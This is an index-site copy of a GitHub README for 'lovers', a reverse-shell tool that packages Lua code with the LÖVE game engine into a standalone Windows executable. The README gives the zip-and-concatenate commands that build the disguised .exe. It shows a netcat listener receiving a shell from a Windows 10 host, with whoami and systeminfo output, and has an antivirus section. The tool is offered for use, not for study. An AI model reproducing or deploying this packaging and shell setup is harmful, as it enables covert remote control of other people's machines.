An open API service indexing awesome lists of open source software.

https://github.com/potato-industries/lovers

portable LÖVE (love2d) reverse shell
https://github.com/potato-industries/lovers

love2d lua reverse-shell

Last synced: 2 months ago
JSON representation

portable LÖVE (love2d) reverse shell

Awesome Lists containing this project

README

        

# lovers

portable LÖVE (basically packaged lua) reverse shell

https://love2d.org/

Using non-interactive lua reverse shell

https://gtfobins.github.io/gtfobins/lua/

**Deploy**

https://love2d.org/#download

**Pack**
```
zip -9 -r lovers.love main.lua
cat love.exe lovers.love > lovers.exe
```

```
WOPR@WOPR webassembly % nc -v -l 9999
whoami
windev1910eval\user
systeminfo

Host Name: WINDEV1910EVAL
OS Name: Microsoft Windows 10 Enterprise Evaluation
OS Version: 10.0.18362 N/A Build 18362
```

**AV**

Screenshot 2019-12-09 at 08 59 14

Enjoy~